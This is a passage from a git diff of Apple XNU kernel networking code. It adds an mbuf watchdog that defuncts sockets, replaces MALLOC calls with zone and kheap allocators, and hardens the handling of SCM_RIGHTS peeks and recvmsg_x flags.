unused(arg0, arg1) + struct mbuf_watchdog_defunct_args args = {}; + struct fileproc *fp = NULL; + + proc_iterate(PROC_ALLPROCLIST, + mbuf_watchdog_defunct_iterate, &args, NULL, NULL); + + /* + * Defunct all sockets from this app. + */ + if (args.top_app != NULL) { + os_log(OS_LOG_DEFAULT, "%s: defuncting all sockets from %s.%d", + __func__, + proc_name_address(args.top_app), + proc_pid(args.top_app)); + proc_fdlock(args.top_app); + fdt_foreach(fp, args.top_app) { + struct fileglob *fg = fp->fp_glob; + struct socket *so = NULL; + + if (FILEGLOB_DTYPE(fg) != DTYPE_SOCKET) { + continue; + } + so = (struct socket *)fp->fp_glob->fg_data; + socket_lock(so, 0); + if (sosetdefunct(args.top_app, so, + SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL, + TRUE) == 0) { + sodefunct(args.top_app, so, + SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL); + } + socket_unlock(so, 0); + } + proc_fdunlock(args.top_app); + proc_rele(args.top_app); + mbstat.m_forcedefunct++; + } + mbuf_watchdog_defunct_active = false; +} + /* * Called during slab (blocking and non-blocking) allocation. If there * is at least one waiter, and the time since the first waiter is blocked @@ -6796,13 +6891,43 @@ mbuf_watchdog(void) { struct timeval now; unsigned int since; + static thread_call_t defunct_tcall = NULL; if (mb_waiters == 0 || !mb_watchdog) { return; } + LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED); + microuptime(&now); since = now.tv_sec - mb_wdtstart.tv_sec; + + /* + * Check if we are about to panic the system due + * to lack of mbufs and start defuncting sockets + * from processes that use too many sockets. + * + * We're always called with the mbuf_mlock held, + * so that also protects mbuf_watchdog_defunct_active. + */ + if (since >= MB_WDT_MAXTIME / 2 && !mbuf_watchdog_defunct_active) { + /* + * Start a thread to defunct sockets + * from apps that are over-using their socket + * buffers. + */ + if (defunct_tcall == NULL) { + defunct_tcall = + thread_call_allocate_with_options(mbuf_watchdog_defunct, + NULL, + THREAD_CALL_PRIORITY_KERNEL, + THREAD_CALL_OPTIONS_ONCE); + } + if (defunct_tcall != NULL) { + mbuf_watchdog_defunct_active = true; + thread_call_enter(defunct_tcall); + } + } if (since >= MB_WDT_MAXTIME) { panic_plain("%s: %d waiters stuck for %u secs\n%s", __func__, mb_waiters, since, mbuf_dump()); @@ -7060,11 +7185,9 @@ slab_get(void *buf) lck_mtx_unlock(mbuf_mlock); /* This is a new buffer; create the slabs group for it */ - MALLOC(slg, mcl_slabg_t *, sizeof(*slg), M_TEMP, - M_WAITOK | M_ZERO); - MALLOC(slg->slg_slab, mcl_slab_t *, sizeof(mcl_slab_t) * NSLABSPMB, - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(slg != NULL && slg->slg_slab != NULL); + slg = zalloc_permanent_type(mcl_slabg_t); + slg->slg_slab = zalloc_permanent(sizeof(mcl_slab_t) * NSLABSPMB, + ZALIGN(mcl_slab_t)); lck_mtx_lock(mbuf_mlock); /* @@ -7471,13 +7594,25 @@ __abortlike static void mcl_audit_mcheck_panic(struct mbuf *m) { + char buf[DUMP_MCA_BUF_SIZE]; mcache_audit_t *mca; MRANGE(m); mca = mcl_audit_buf2mca(MC_MBUF, (mcache_obj_t *)m); panic("mcl_audit: freed mbuf %p with type 0x%x (instead of 0x%x)\n%s\n", - m, (u_int16_t)m->m_type, MT_FREE, mcache_dump_mca(mca)); + m, (u_int16_t)m->m_type, MT_FREE, mcache_dump_mca(buf, mca)); + /* NOTREACHED */ +} + +__abortlike +static void +mcl_audit_verify_nextptr_panic(void *next, mcache_audit_t *mca) +{ + char buf[DUMP_MCA_BUF_SIZE]; + panic("mcl_audit: buffer %p modified after free at offset 0: " + "%p out of range [%p-%p)\n%s\n", + mca->mca_addr, next, mbutl, embutl, mcache_dump_mca(buf, mca)); /* NOTREACHED */ } @@ -7486,10 +7621,7 @@ mcl_audit_verify_nextptr(void *next, mcache_audit_t *mca) { if (next != NULL && !MBUF_IN_MAP(next) && (next != (void *)MCACHE_FREE_PATTERN || !mclverify)) { - panic("mcl_audit: buffer %p modified after free at offset 0: " - "%p out of range [%p-%p)\n%s\n", - mca->mca_addr, next, mbutl, embutl, mcache_dump_mca(mca)); - /* NOTREACHED */ + mcl_audit_verify_nextptr_panic(next, mca); } } @@ -7514,17 +7646,11 @@ mleak_activate(void) mleak_alloc_buckets * sizeof(struct mallocation); vm_size_t trace_size = mleak_trace_buckets * sizeof(struct mtrace); - MALLOC(mleak_allocations, struct mallocation *, alloc_size, - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mleak_allocations != NULL); + mleak_allocations = zalloc_permanent(alloc_size, ZALIGN(struct mallocation)); + mleak_traces = zalloc_permanent(trace_size, ZALIGN(struct mtrace)); + mleak_stat = zalloc_permanent(MLEAK_STAT_SIZE(MLEAK_NUM_TRACES), + ZALIGN(mleak_stat_t)); - MALLOC(mleak_traces, struct mtrace *, trace_size, - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mleak_traces != NULL); - - MALLOC(mleak_stat, mleak_stat_t *, MLEAK_STAT_SIZE(MLEAK_NUM_TRACES), - M_TEMP, M_WAITOK | M_ZERO); - VERIFY(mleak_stat != NULL); mleak_stat->ml_cnt = MLEAK_NUM_TRACES; #ifdef __LP64__ mleak_stat->ml_isaddr64 = 1; @@ -8689,11 +8815,12 @@ _mbwdog_logger(const char *func, const int line, const char *fmt, ...) LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED); if (mbwdog_logging == NULL) { - mbwdog_logging = _MALLOC(mbwdog_logging_size, - M_TEMP, M_ZERO | M_NOWAIT); - if (mbwdog_logging == NULL) { - return; - } + /* + * This might block under a mutex, which isn't really great, + * but this happens once, so we'll live. + */ + mbwdog_logging = zalloc_permanent(mbwdog_logging_size, + ZALIGN_NONE); } va_start(ap, fmt); vsnprintf(p, sizeof(p), fmt, ap); @@ -8729,80 +8856,6 @@ SYSCTL_PROC(_kern_ipc, OID_AUTO, mbwdog_log, CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_LOCKED, 0, 0, sysctl_mbwdog_log, "A", ""); -static int mbtest_val; -static int mbtest_running; - -static void -mbtest_thread(__unused void *arg) -{ - int i; - int scale_down = 1; - int iterations = 250; - int allocations = nmbclusters; - iterations = iterations / scale_down; - allocations = allocations / scale_down; - printf("%s thread starting\n", __func__); - for (i = 0; i < iterations; i++) { - unsigned int needed = allocations; - struct mbuf *m1, *m2, *m3; - - if (njcl > 0) { - needed = allocations; - m3 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, M16KCLBYTES); - m_freem_list(m3); - } - - needed = allocations; - m2 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, MBIGCLBYTES); - m_freem_list(m2); - - m1 = m_getpackets_internal(&needed, 0, M_DONTWAIT, 0, MCLBYTES); - m_freem_list(m1); - } - - printf("%s thread ending\n", __func__); - - OSDecrementAtomic(&mbtest_running); - wakeup_one((caddr_t)&mbtest_running); -} - -static void -sysctl_mbtest(void) -{ - /* We launch three threads - wait for all of them */ - OSIncrementAtomic(&mbtest_running); - OSIncrementAtomic(&mbtest_running); - OSIncrementAtomic(&mbtest_running); - - thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10); - thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10); - thread_call_func_delayed((thread_call_func_t)mbtest_thread, NULL, 10); - - while (mbtest_running) { - msleep((caddr_t)&mbtest_running, NULL, PUSER, "mbtest_running", NULL); - } -} - -static int -mbtest SYSCTL_HANDLER_ARGS -{ -#pragma unused(arg1, arg2) - int error = 0, val, oldval = mbtest_val; - - val = oldval; - error = sysctl_handle_int(oidp, &val, 0, req); - if (error || !req->newptr) { - return error; - } - - if (val != oldval) { - sysctl_mbtest(); - } - - mbtest_val = val; - - return error; -} #endif // DEBUG || DEVELOPMENT static void @@ -8835,9 +8888,6 @@ mtracelarge_register(size_t size) SYSCTL_DECL(_kern_ipc); #if DEBUG || DEVELOPMENT -SYSCTL_PROC(_kern_ipc, OID_AUTO, mbtest, - CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_LOCKED, &mbtest_val, 0, &mbtest, "I", - "Toggle to test mbufs"); #endif SYSCTL_PROC(_kern_ipc, KIPC_MBSTAT, mbstat, CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_LOCKED, diff --git a/bsd/kern/uipc_socket.c b/bsd/kern/uipc_socket.c index e1a5241a2..cc13d328c 100644 --- a/bsd/kern/uipc_socket.c +++ b/bsd/kern/uipc_socket.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 1998-2020 Apple Inc. All rights reserved. + * Copyright (c) 1998-2021 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -153,10 +153,8 @@ static u_int32_t so_cache_time; static int socketinit_done; static struct zone *so_cache_zone; -static lck_grp_t *so_cache_mtx_grp; -static lck_attr_t *so_cache_mtx_attr; -static lck_grp_attr_t *so_cache_mtx_grp_attr; -static lck_mtx_t *so_cache_mtx; +static LCK_GRP_DECLARE(so_cache_mtx_grp, "so_cache"); +static LCK_MTX_DECLARE(so_cache_mtx, &so_cache_mtx_grp); #include @@ -410,24 +408,6 @@ socketinit(void) PE_parse_boot_argn("socket_debug", &socket_debug, sizeof(socket_debug)); - /* - * allocate lock group attribute and group for socket cache mutex - */ - so_cache_mtx_grp_attr = lck_grp_attr_alloc_init(); - so_cache_mtx_grp = lck_grp_alloc_init("so_cache", - so_cache_mtx_grp_attr); - - /* - * allocate the lock attribute for socket cache mutex - */ - so_cache_mtx_attr = lck_attr_alloc_init(); - - /* cached sockets mutex */ - so_cache_mtx = lck_mtx_alloc_init(so_cache_mtx_grp, so_cache_mtx_attr); - if (so_cache_mtx == NULL) { - panic("%s: unable to allocate so_cache_mtx\n", __func__); - /* NOTREACHED */ - } STAILQ_INIT(&so_cache_head); so_cache_zone_element_size = (vm_size_t)(sizeof(struct socket) + 4 @@ -442,7 +422,6 @@ socketinit(void) soextbkidlestat.so_xbkidle_rcvhiwat = SO_IDLE_BK_IDLE_RCV_HIWAT; in_pcbinit(); - sflt_init(); socket_tclass_init(); #if MULTIPATH mp_pcbinit(); @@ -455,7 +434,7 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how) caddr_t temp; uintptr_t offset; - lck_mtx_lock(so_cache_mtx); + lck_mtx_lock(&so_cache_mtx); if (!STAILQ_EMPTY(&so_cache_head)) { VERIFY(cached_sock_count > 0); @@ -465,14 +444,14 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how) STAILQ_NEXT((*so), so_cache_ent) = NULL; cached_sock_count--; - lck_mtx_unlock(so_cache_mtx); + lck_mtx_unlock(&so_cache_mtx); temp = (*so)->so_saved_pcb; bzero((caddr_t)*so, sizeof(struct socket)); (*so)->so_saved_pcb = temp; } else { - lck_mtx_unlock(so_cache_mtx); + lck_mtx_unlock(&so_cache_mtx); *so = zalloc_flags(so_cache_zone, how | Z_ZERO); @@ -502,12 +481,12 @@ cached_sock_alloc(struct socket **so, zalloc_flags_t how) static void cached_sock_free(struct socket *so) { - lck_mtx_lock(so_cache_mtx); + lck_mtx_lock(&so_cache_mtx); so_cache_time = net_uptime(); if (++cached_sock_count > max_cached_sock_count) { --cached_sock_count; - lck_mtx_unlock(so_cache_mtx); + lck_mtx_unlock(&so_cache_mtx); zfree(so_cache_zone, so); } else { if (so_cache_hw < cached_sock_count) { @@ -517,7 +496,7 @@ cached_sock_free(struct socket *so) STAILQ_INSERT_TAIL(&so_cache_head, so, so_cache_ent); so->cache_timestamp = so_cache_time; - lck_mtx_unlock(so_cache_mtx); + lck_mtx_unlock(&so_cache_mtx); } } @@ -574,7 +553,7 @@ so_cache_timer(void) int n_freed = 0; boolean_t rc = FALSE; - lck_mtx_lock(so_cache_mtx); + lck_mtx_lock(&so_cache_mtx); so_cache_timeouts++; so_cache_time = net_uptime(); @@ -602,7 +581,7 @@ so_cache_timer(void) rc = TRUE; } - lck_mtx_unlock(so_cache_mtx); + lck_mtx_unlock(&so_cache_mtx); return rc; } @@ -2510,9 +2489,7 @@ sosend(struct socket *so, struct sockaddr *addr, struct uio *uio, if (error) { if (error == EJUSTRETURN) { error = 0; - clen = 0; - control = NULL; - top = NULL; + goto packet_consumed; } goto out_locked; } @@ -3055,6 +3032,20 @@ done: return error; } +/* + * When peeking SCM_RIGHTS, the actual file descriptors are not yet created + * so clear the data portion in order not to leak the file pointers + */ +static void +sopeek_scm_rights(struct mbuf *rights) +{ + struct cmsghdr *cm = mtod(rights, struct cmsghdr *); + + if (cm->cmsg_type == SCM_RIGHTS) { + memset(cm + 1, 0, cm->cmsg_len - sizeof(*cm)); + } +} + /* * Process one or more MT_CONTROL mbufs present before any data mbufs * in the first mbuf chain on the socket buffer. If MSG_PEEK, we @@ -3103,6 +3094,9 @@ soreceive_ctl(struct socket *so, struct mbuf **controlp, int flags, error = ENOBUFS; goto done; } + + sopeek_scm_rights(*controlp); + controlp = &(*controlp)->m_next; } m = m->m_next; @@ -3681,6 +3675,11 @@ dontblock: } else if (type == MT_OOBDATA) { break; } + + if (m->m_type != MT_OOBDATA && m->m_type != MT_DATA && + m->m_type != MT_HEADER) { + break; + } /* * Make sure to allways set MSG_OOB event when getting * out of band data inline. @@ -8009,10 +8008,6 @@ socket_post_kev_msg_closed(struct socket *so) &ev.ev_data, sizeof(ev)); } } - if (socksa != NULL) { - FREE(socksa, M_SONAME); - } - if (peersa != NULL) { - FREE(peersa, M_SONAME); - } + FREE(socksa, M_SONAME); + FREE(peersa, M_SONAME); } diff --git a/bsd/kern/uipc_syscalls.c b/bsd/kern/uipc_syscalls.c index e82721676..45e0f674e 100644 --- a/bsd/kern/uipc_syscalls.c +++ b/bsd/kern/uipc_syscalls.c @@ -166,8 +166,8 @@ static boolean_t uio_array_is_valid(struct uio **, u_int); static int recv_msg_array_is_valid(struct recv_msg_elem *, u_int); static int internalize_recv_msghdr_array(const void *, int, int, u_int, struct user_msghdr_x *, struct recv_msg_elem *); -static u_int externalize_recv_msghdr_array(void *, int, int, u_int, - const struct user_msghdr_x *, struct recv_msg_elem *); +static u_int externalize_recv_msghdr_array(struct proc *, struct socket *, void *, u_int, + struct user_msghdr_x *, struct recv_msg_elem *, int *); static struct recv_msg_elem *alloc_recv_msg_array(u_int count); static void free_recv_msg_array(struct recv_msg_elem *, u_int); @@ -1307,7 +1307,7 @@ sendit(struct proc *p, struct socket *so, struct user_msghdr *mp, uio_t uiop, *retval = (int)(len - uio_resid(uiop)); } bad: - if (to != NULL && want_free) { + if (want_free) { FREE(to, M_SONAME); } out: @@ -1540,6 +1540,9 @@ sendmsg_x(struct proc *p, struct sendmsg_x_args *uap, user_ssize_t *retval) KERNEL_DEBUG(DBG_FNC_SENDMSG_X | DBG_FUNC_START, 0, 0, 0, 0, 0); + size_of_msghdr = IS_64BIT_PROCESS(p) ? + sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x); + if (uap->flags & MSG_SKIPCFIL) { error = EPERM; goto out; @@ -1569,28 +1572,25 @@ sendmsg_x(struct proc *p, struct sendmsg_x_args *uap, user_ssize_t *retval) uap->cnt = somaxsendmsgx; } - user_msg_x = _MALLOC(uap->cnt * sizeof(struct user_msghdr_x), - M_TEMP, M_WAITOK | M_ZERO); + user_msg_x = kheap_alloc(KHEAP_TEMP, + uap->cnt * sizeof(struct user_msghdr_x), Z_WAITOK | Z_ZERO); if (user_msg_x == NULL) { - DBG_PRINTF("%s _MALLOC() user_msg_x failed\n", __func__); + DBG_PRINTF("%s kheap_alloc user_msg_x failed\n", __func__); error = ENOMEM; goto out; } - uiop = _MALLOC(uap->cnt * sizeof(struct uio *), - M_TEMP, M_WAITOK | M_ZERO); + uiop = kheap_alloc(KHEAP_TEMP, + uap->cnt * sizeof(struct uio *), Z_WAITOK | Z_ZERO); if (uiop == NULL) { - DBG_PRINTF("%s _MALLOC() uiop failed\n", __func__); + DBG_PRINTF("%s kheap_alloc uiop failed\n", __func__); error = ENOMEM; goto out; } - size_of_msghdr = IS_64BIT_PROCESS(p) ? - sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x); - - umsgp = _MALLOC(uap->cnt * size_of_msghdr, - M_TEMP, M_WAITOK | M_ZERO); + umsgp = kheap_alloc(KHEAP_TEMP, + uap->cnt * size_of_msghdr, Z_WAITOK | Z_ZERO); if (umsgp == NULL) { - printf("%s _MALLOC() user_msg_x failed\n", __func__); + printf("%s kheap_alloc user_msg_x failed\n", __func__); error = ENOMEM; goto out; } @@ -1720,16 +1720,14 @@ out: if (need_drop) { file_drop(uap->s); } - if (umsgp != NULL) { - _FREE(umsgp, M_TEMP); - } + kheap_free(KHEAP_TEMP, umsgp, uap->cnt * size_of_msghdr); if (uiop != NULL) { free_uio_array(uiop, uap->cnt); - _FREE(uiop, M_TEMP); - } - if (user_msg_x != NULL) { - _FREE(user_msg_x, M_TEMP); + kheap_free(KHEAP_TEMP, uiop, + uap->cnt * sizeof(struct uio *)); } + kheap_free(KHEAP_TEMP, user_msg_x, + uap->cnt * sizeof(struct user_msghdr_x)); KERNEL_DEBUG(DBG_FNC_SENDMSG_X | DBG_FUNC_END, error, 0, 0, 0, 0); @@ -1965,9 +1963,7 @@ recvit(struct proc *p, int s, struct user_msghdr *mp, uio_t uiop, &mp->msg_controllen, &mp->msg_flags, so); } out: - if (fromsa) { - FREE(fromsa, M_SONAME); - } + FREE(fromsa, M_SONAME); if (control) { m_freem(control); } @@ -2199,6 +2195,9 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) KERNEL_DEBUG(DBG_FNC_RECVMSG_X | DBG_FUNC_START, 0, 0, 0, 0, 0); + size_of_msghdr = IS_64BIT_PROCESS(p) ? + sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x); + error = file_socket(uap->s, &so); if (error) { goto out; @@ -2208,6 +2207,12 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) error = EBADF; goto out; } + /* + * Support only a subset of message flags + */ + if (uap->flags & ~(MSG_PEEK | MSG_WAITALL | MSG_DONTWAIT | MSG_NEEDSA | MSG_NBIO)) { + return EOPNOTSUPP; + } /* * Input parameter range check */ @@ -2219,10 +2224,10 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) uap->cnt = somaxrecvmsgx; } - user_msg_x = _MALLOC(uap->cnt * sizeof(struct user_msghdr_x), - M_TEMP, M_WAITOK | M_ZERO); + user_msg_x = kheap_alloc(KHEAP_TEMP, + uap->cnt * sizeof(struct user_msghdr_x), Z_WAITOK | Z_ZERO); if (user_msg_x == NULL) { - DBG_PRINTF("%s _MALLOC() user_msg_x failed\n", __func__); + DBG_PRINTF("%s kheap_alloc user_msg_x failed\n", __func__); error = ENOMEM; goto out; } @@ -2232,12 +2237,11 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) error = ENOMEM; goto out; } - size_of_msghdr = IS_64BIT_PROCESS(p) ? - sizeof(struct user64_msghdr_x) : sizeof(struct user32_msghdr_x); - umsgp = _MALLOC(uap->cnt * size_of_msghdr, M_TEMP, M_WAITOK | M_ZERO); + umsgp = kheap_alloc(KHEAP_TEMP, + uap->cnt * size_of_msghdr, Z_WAITOK | Z_ZERO); if (umsgp == NULL) { - DBG_PRINTF("%s _MALLOC() umsgp failed\n", __func__); + DBG_PRINTF("%s kheap_alloc umsgp failed\n", __func__); error = ENOMEM; goto out; } @@ -2318,7 +2322,7 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) &recv_msg_elem->controlp : NULL; error = so->so_proto->pr_usrreqs->pru_soreceive(so, psa, - auio, (struct mbuf **)0, controlp, &flags); + auio, (struct mbuf **)NULL, controlp, &flags); if (error) { break; } @@ -2326,17 +2330,18 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) * We have some data */ recv_msg_elem->which |= SOCK_MSG_DATA; + /* + * Set the messages flags for this packet + */ + flags &= ~MSG_DONTWAIT; + recv_msg_elem->flags = flags; /* * Stop on partial copy */ - if (flags & (MSG_RCVMORE | MSG_TRUNC)) { + if (recv_msg_elem->flags & (MSG_RCVMORE | MSG_TRUNC)) { break; } } - if ((uap->flags & MSG_DONTWAIT) == 0) { - flags &= ~MSG_DONTWAIT; - } - uap->flags = flags; } len_after = recv_msg_array_resid(recv_msg_array, uap->cnt); @@ -2350,9 +2355,11 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) } } - uiocnt = externalize_recv_msghdr_array(umsgp, - IS_64BIT_PROCESS(p) ? UIO_USERSPACE64 : UIO_USERSPACE32, - UIO_READ, uap->cnt, user_msg_x, recv_msg_array); + uiocnt = externalize_recv_msghdr_array(p, so, umsgp, + uap->cnt, user_msg_x, recv_msg_array, &error); + if (error != 0) { + goto out; + } error = copyout(umsgp, uap->msgp, uap->cnt * size_of_msghdr); if (error) { @@ -2361,40 +2368,14 @@ recvmsg_x(struct proc *p, struct recvmsg_x_args *uap, user_ssize_t *retval) } *retval = (int)(uiocnt); - for (i = 0; i < uap->cnt; i++) { - struct user_msghdr_x *mp = user_msg_x + i; - struct recv_msg_elem *recv_msg_elem = recv_msg_array + i; - struct sockaddr *fromsa = recv_msg_elem->psa; - - if (mp->msg_name) { - error = copyout_sa(fromsa, mp->msg_name, - &mp->msg_namelen); - if (error) { - goto out; - } - } - if (mp->msg_control) { - error = copyout_control(p, recv_msg_elem->controlp, - mp->msg_control, &mp->msg_controllen, - &mp->msg_flags, so); - if (error) { - goto out; - } - } - } out: if (need_drop) { file_drop(uap->s); } - if (umsgp != NULL) { - _FREE(umsgp, M_TEMP); - } - if (recv_msg_array != NULL) { - free_recv_msg_array(recv_msg_array, uap->cnt); - } - if (user_msg_x != NULL) { - _FREE(user_msg_x, M_TEMP); - } + kheap_free(KHEAP_TEMP, umsgp, uap->cnt * size_of_msghdr); + free_recv_msg_array(recv_msg_array, uap->cnt); + kheap_free(KHEAP_TEMP, user_msg_x, + uap->cnt * sizeof(struct user_msghdr_x)); KERNEL_DEBUG(DBG_FNC_RECVMSG_X | DBG_FUNC_END, error, 0, 0, 0, 0); @@ -2633,9 +2614,7 @@ getsockname(__unused struct proc *p, struct getsockname_args *uap, gotnothing: error = copyout((caddr_t)&len, uap->alen, sizeof(socklen_t)); bad: - if (sa) { - FREE(sa, M_SONAME); - } + FREE(sa, M_SONAME); out: file_drop(uap->fdes); return error; @@ -2722,9 +2701,7 @@ getpeername(__unused struct proc *p, struct getpeername_args *uap, gotnothing: error = copyout((caddr_t)&len, uap->alen, sizeof(socklen_t)); bad: - if (sa) { - FREE(sa, M_SONAME); - } + FREE(sa, M_SONAME); out: file_drop(uap->fdes); return error; @@ -3092,48 +3069,60 @@ externalize_user_msghdr_array(void *dst, int spacetype, int direction, } u_int -externalize_recv_msghdr_array(void *dst, int spacetype, int direction, - u_int count, const struct user_msghdr_x *src, - struct recv_msg_elem *recv_msg_array) +externalize_recv_msghdr_array(struct proc *p, struct socket *so, void *dst, + u_int count, struct user_msghdr_x *src, + struct recv_msg_elem *recv_msg_array, int *ret_error) { u_int i; - int seenlast = 0; u_int retcnt = 0; + int spacetype = IS_64BIT_PROCESS(p) ? UIO_USERSPACE64 : UIO_USERSPACE32; + + *ret_error = 0; for (i = 0; i < count; i++) { - const struct user_msghdr_x *user_msg = src + i; + struct user_msghdr_x *user_msg = src + i; struct recv_msg_elem *recv_msg_elem = recv_msg_array + i; - user_ssize_t len; + user_ssize_t len = 0; + int error; len = user_msg->msg_datalen - uio_resid(recv_msg_elem->uio); - if (direction == UIO_READ) { - if ((recv_msg_elem->which & SOCK_MSG_DATA) == 0) { - seenlast = 1; + if ((recv_msg_elem->which & SOCK_MSG_DATA)) { + retcnt++; + + + if (recv_msg_elem->which & SOCK_MSG_SA) { + error = copyout_sa(recv_msg_elem->psa, user_msg->msg_name, + &user_msg->msg_namelen); + if (error != 0) { + *ret_error = error; + return 0; + } } - } else { - if (user_msg->msg_datalen != 0 && len == 0) { - seenlast = 1; + if (recv_msg_elem->which & SOCK_MSG_CONTROL) { + error = copyout_control(p, recv_msg_elem->controlp, + user_msg->msg_control, &user_msg->msg_controllen, + &recv_msg_elem->flags, so); + if (error != 0) { + *ret_error = error; + return 0; + } } } - if (seenlast == 0) { - retcnt++; - } - if (spacetype == UIO_USERSPACE64) { - struct user64_msghdr_x *msghdr64; - - msghdr64 = ((struct user64_msghdr_x *)dst) + i; + struct user64_msghdr_x *msghdr64 = ((struct user64_msghdr_x *)dst) + i; - msghdr64->msg_flags = user_msg->msg_flags; + msghdr64->msg_namelen = user_msg->msg_namelen; + msghdr64->msg_controllen = user_msg->msg_controllen; + msghdr64->msg_flags = recv_msg_elem->flags; msghdr64->msg_datalen = len; } else { - struct user32_msghdr_x *msghdr32; - - msghdr32 = ((struct user32_msghdr_x *)dst) + i; + struct user32_msghdr_x *msghdr32 = ((struct user32_msghdr_x *)dst) + i; - msghdr32->msg_flags = user_msg->msg_flags; + msghdr32->msg_namelen = user_msg->msg_namelen; + msghdr32->msg_controllen = user_msg->msg_controllen; + msghdr32->msg_flags = recv_msg_elem->flags; msghdr32->msg_datalen = (user32_size_t)len; } } @@ -3201,33 +3190,29 @@ uio_array_is_valid(struct uio **uiop, u_int count) struct recv_msg_elem * alloc_recv_msg_array(u_int count) { - struct recv_msg_elem *recv_msg_array; - - recv_msg_array = _MALLOC(count * sizeof(struct recv_msg_elem), - M_TEMP, M_WAITOK | M_ZERO); - - return recv_msg_array; + return kheap_alloc(KHEAP_TEMP, + count * sizeof(struct recv_msg_elem), Z_WAITOK | Z_ZERO); } void free_recv_msg_array(struct recv_msg_elem *recv_msg_array, u_int count) { - u_int i; - - for (i = 0; i < count; i++) { + if (recv_msg_array == NULL) { + return; + } + for (uint32_t i = 0; i < count; i++) { struct recv_msg_elem *recv_msg_elem = recv_msg_array + i; if (recv_msg_elem->uio != NULL) { uio_free(recv_msg_elem->uio); } - if (recv_msg_elem->psa != NULL) { - _FREE(recv_msg_elem->psa, M_TEMP); - } + _FREE(recv_msg_elem->psa, M_TEMP); if (recv_msg_elem->controlp != NULL) { m_freem(recv_msg_elem->controlp); } } - _FREE(recv_msg_array, M_TEMP); + kheap_free(KHEAP_TEMP, recv_msg_array, + count * sizeof(struct recv_msg_elem)); } diff --git a/bsd/kern/uipc_usrreq.c b/bsd/kern/uipc_usrreq.c index c363f4cf3..5e45f89ee 100644 --- a/bsd/kern/uipc_usrreq.c +++ b/bsd/kern/uipc_usrreq.c @@ -110,14 +110,14 @@ ZONE_DECLARE(unp_zone, "unpzone", sizeof(struct unpcb), ZC_NONE); static unp_gen_t unp_gencnt; static u_int unp_count; -static lck_attr_t *unp_mtx_attr; -static lck_grp_t *unp_mtx_grp; -static lck_grp_attr_t *unp_mtx_grp_attr; -static lck_rw_t unp_list_mtx; - -static lck_mtx_t unp_disconnect_lock; -static lck_mtx_t unp_connect_lock; -static lck_mtx_t uipc_lock; +static LCK_ATTR_DECLARE(unp_mtx_attr, 0, 0); +static LCK_GRP_DECLARE(unp_mtx_grp, "unp_list"); +static LCK_RW_DECLARE_ATTR(unp_list_mtx, &unp_mtx_grp, &unp_mtx_attr); + +static LCK_MTX_DECLARE_ATTR(unp_disconnect_lock, &unp_mtx_grp, &unp_mtx_attr); +static LCK_MTX_DECLARE_ATTR(unp_connect_lock, &unp_mtx_grp, &unp_mtx_attr); +static LCK_MTX_DECLARE_ATTR(uipc_lock, &unp_mtx_grp, &unp_mtx_attr); + static u_int disconnect_in_progress; static struct unp_head unp_shead, unp_dhead; @@ -917,8 +917,7 @@ unp_attach(struct socket *so) } bzero(unp, sizeof(*unp)); - lck_mtx_init(&unp->unp_mtx, - unp_mtx_grp, unp_mtx_attr); + lck_mtx_init(&unp->unp_mtx, &unp_mtx_grp, &unp_mtx_attr); lck_rw_lock_exclusive(&unp_list_mtx); LIST_INIT(&unp->unp_refs); @@ -1743,8 +1742,8 @@ unp_pcblist SYSCTL_HANDLER_ARGS return 0; } - MALLOC(unp_list, struct unpcb **, n * sizeof(*unp_list), - M_TEMP, M_WAITOK); + size_t unp_list_len = n * sizeof(*unp_list); + unp_list = kheap_alloc(KHEAP_TEMP, unp_list_len, Z_WAITOK); if (unp_list == 0) { lck_rw_done(&unp_list_mtx); return ENOMEM; @@ -1801,7 +1800,7 @@ unp_pcblist SYSCTL_HANDLER_ARGS xug.xug_count = unp_count; error = SYSCTL_OUT(req, &xug, sizeof(xug)); } - FREE(unp_list, M_TEMP); + kheap_free(KHEAP_TEMP, unp_list, unp_list_len); lck_rw_done(&unp_list_mtx); return error; } @@ -1872,8 +1871,8 @@ unp_pcblist64 SYSCTL_HANDLER_ARGS return 0; } - MALLOC(unp_list, struct unpcb **, n * sizeof(*unp_list), - M_TEMP, M_WAITOK); + size_t unp_list_size = n * sizeof(*unp_list); + unp_list = kheap_alloc(KHEAP_TEMP, unp_list_size, Z_WAITOK); if (unp_list == 0) { lck_rw_done(&unp_list_mtx); return ENOMEM; @@ -1954,7 +1953,7 @@ unp_pcblist64 SYSCTL_HANDLER_ARGS xug.xug_count = unp_count; error = SYSCTL_OUT(req, &xug, sizeof(xug)); } - FREE(unp_list, M_TEMP); + kheap_free(KHEAP_TEMP, unp_list, unp_list_size); lck_rw_done(&unp_list_mtx); return error; } @@ -2156,8 +2155,8 @@ unp_externalize(struct mbuf *rights) int newfds = (cm->cmsg_len - sizeof(*cm)) / sizeof(int); int f, error = 0; - MALLOC(fileproc_l, struct fileproc **, - newfds * sizeof(struct 